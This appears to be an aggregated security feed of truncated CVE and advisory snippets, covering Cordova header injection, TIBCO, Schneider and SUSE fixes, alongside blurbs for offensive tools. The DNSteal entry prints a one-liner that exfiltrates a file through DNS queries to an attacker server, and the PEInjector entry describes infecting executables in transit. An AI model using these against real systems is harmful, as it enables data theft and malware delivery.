CVE-2015-5204
CRLF injection vulnerability in the Apache Cordova File Transfer Plugin cordova-plugin-file-transfer for Android before 1.3.0 allows remote attackers to inject arbitrary headers via CRLF sequences in the filename of an uploaded file...
CVE-2015-5204
CVE-2015-5204 affects the cordova-plugin-file-transfer for Android (versions 1.2.1 and earlier). The root cause is HTTP header injection via improper validation of the Filename argument, allowing an attacker to inject CRLF sequences and thus manipulate headers in the HTTP response. Documented imp...
SHAREit WebShare 2.3.80 Cross Site Scripting
http://192.168.1.5/list?path=alert/Mahdi.Hidden/...
Cisco Web Security Appliance Denial of Service Vulnerability (CNVD-2015-07874)
The Cisco Web Security Appliance is a secure Web gateway that integrates malware protection, application visualization control, policy control, and more in one platform. A security vulnerability exists in the Cisco Web Security Appliance WSA appliance software versions 8.0.7-142 and 8.5.1-021,...
SUSE SLED11 / SLES11 Security Update : LibVNCServer (SUSE-SU-2015:2110-1)
The libvncserver package was updated to fix the following security issues : - bsc897031: fix several security issues : - CVE-2014-6051: Integer overflow in MallocFrameBuffer on client side. - CVE-2014-6052: Lack of malloc return value checking on client side. - CVE-2014-6053: Server crash on a ve...
SHAREit WebShare 2.3.80 Cross Site Request Forgery
Ex. http://192.168.1.2 Ex. /folder/image.jpg setTimeoutcsrf.submit,1; Ex. http://192.168.1.2 Ex. /folder/ setTimeoutcsrf.submit,1;...
Apache cordova-plugin-file-transfer HTTP header injection vulnerability
Apache Cordova is the Apache Software Foundation's platform for developing mobile applications using HTML, CSS, and JavaScript, and is the core engine that drives the PhoneGap development framework. Apache cordova-plugin-file-transfer is a file transfer plugin. An HTTP...
Powercat - Netcat: The Powershell Version
Installation powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts. Load The Function From Downloaded .ps1 File: . .\powercat.p...
Re: CVE-2015-5204: HTTP header injection vulnerability in Apache Cordova File Transfer Plugin for Android
CVE-2015-5204: HTTP header injection vulnerability in Apache Cordova File Transfer Plugin for Android Severity: Medium Vendor: The Apache Software Foundation Versions Affected: Cordova Android File Transfer Plugin 1.2.1 and below Description: Android applications built with the Cordova framework...
A vulnerability in the firmware of Schneider Electric’s Modicon M340 programmable logic controller allows a remote attacker to trigger a service failure.
The vulnerability in the firmware of Schneider Electric’s Modicon M340 programmable logic controller is caused by a buffer overflow. Exploiting this vulnerability could allow a malicious actor to trigger a service failure through specially crafted FTP traffic...
Konica Minolta FTP Utility Denial of Service Vulnerability
KONICA MINOLTA FTP Utility is software used with KONICA MINOLTA copiers. Konica Minolta FTP Utility 1.0 contains a buffer overflow vulnerability. A remote attacker could cause a denial of service (application crash) by exploiting this vulnerability via a long USER command...
TIBCO Slingshot Information Disclosure Vulnerability
TIBCO Managed File Transfer is an enterprise-class peer-to-peer file transfer solution. A security vulnerability exists in the TIBCO Managed File Transfer engine that could be exploited by remote attackers to submit a special HTTP request to obtain sensitive information...
Apple OS X tnftpd Denial of Service Vulnerability
Apple OS X is an operating system developed by Apple Inc. A glob handling vulnerability in Apple OS X tnftpd allows attackers to conduct denial of service attacks against FTP servers by exploiting the vulnerability...
CVE-2015-5711
TIBCO Managed File Transfer Internet Server before 7.2.5, Managed File Transfer Command Center before 7.2.5, Slingshot before 1.9.4, and Vault before 2.0.1 allow remote authenticated users to obtain sensitive information via a crafted HTTP request...
CVE-2015-5711
The CVE-2015-5711 entry affects TIBCO products: Managed File Transfer Internet Server (before 7.2.5), Managed File Transfer Command Center (before 7.2.5), Slingshot (before 1.9.4), and Vault (before 2.0.1). The root cause is an information disclosure vulnerability that allows remote authenticated...
Apache Cordova plugin cordova-plugin-file-transfer vulnerable to HTTP header injection
Overview cordova-plugin-file-transfer, a plugin for Apache Cordova provided by the Apache Software Foundation, provides functionality to upload and download files in applications created by Apache Cordova. It also provides functionality to add HTTP headers. Android applications that use...
JVN#21612597: Apache Cordova plugin cordova-plugin-file-transfer vulnerable to HTTP header injection
cordova-plugin-file-transfer, a plugin for Apache Cordova provided by the Apache Software Foundation, provides functionality to upload and download files in applications created by Apache Cordova. It also provides functionality to add HTTP headers. Android applications that use...
DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. On the victim machine, you simply can do something like so: for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done...
PEInjector - MITM PE file infector
The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant,...